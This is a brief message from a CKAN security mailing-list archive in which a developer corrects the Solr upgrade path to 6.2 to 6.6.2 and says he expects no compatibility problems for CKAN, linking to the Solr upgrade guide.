[CKAN-Security] solr 6.2

Adrià Mercader adria.mercader at okfn.org
Thu Feb 22 09:28:45 UTC 2018

Apologies, I misread the available versions and in fact the upgrade is from
6.2 to 6.6.2.

In any case and given the use CKAN makes of Solr I don't see any potential
issues with the upgrade after going through the changes list:

https://lucene.apache.org/solr/guide/6_6/upgrading-solr.html#UpgradingSolr-Upgradingfromearlier6.xversions

Hope this helps,

Adrià